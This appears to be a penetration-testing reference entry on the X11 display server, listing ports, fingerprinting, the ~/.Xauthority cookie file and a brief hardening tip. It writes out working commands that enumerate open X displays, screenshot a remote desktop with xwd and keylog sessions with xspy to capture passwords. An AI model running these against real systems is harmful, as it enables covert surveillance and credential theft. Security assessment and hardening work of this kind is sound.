X11
aka x-server
The X Window System display server on 6000+. With access control disabled (xhost +), a remote attacker can screenshot the desktop and log keystrokes — capturing passwords as they're typed.
Ports
| Port | Proto | Notes |
|---|---|---|
6000 | tcp | X11 display :0 |
Fingerprint
- nmap x11-access reports 'X server access is granted'
- xdpyinfo connects when access control is open
Key files
| Path | Holds | Sensitive |
|---|---|---|
~/.Xauthority | MIT-MAGIC-COOKIE for authenticated X access | sensitive |
Exploitation primitives
- Open access (xhost +) → connect with no auth
- Screenshot the live desktop (xwd) to see what the user is doing
- Keylog the session (xspy) to capture typed passwords
Overview
X11 on 6000 is the Linux GUI display server. If access control is open (xhost +), the display is yours — you can watch and key-log the user’s session.
Enumeration
Check whether access is open:
nmap -p6000 --script x11-access <TARGET>Confirm with xdpyinfo:
xdpyinfo -display <TARGET>:0Screenshot the desktop
xwd -root -display <TARGET>:0 -out screen.xwd && convert screen.xwd screen.pngKeylog the session
xspy <TARGET>:0Hardening
Never use xhost +; require X authority cookies and tunnel X over SSH (ssh -X) instead of exposing 6000.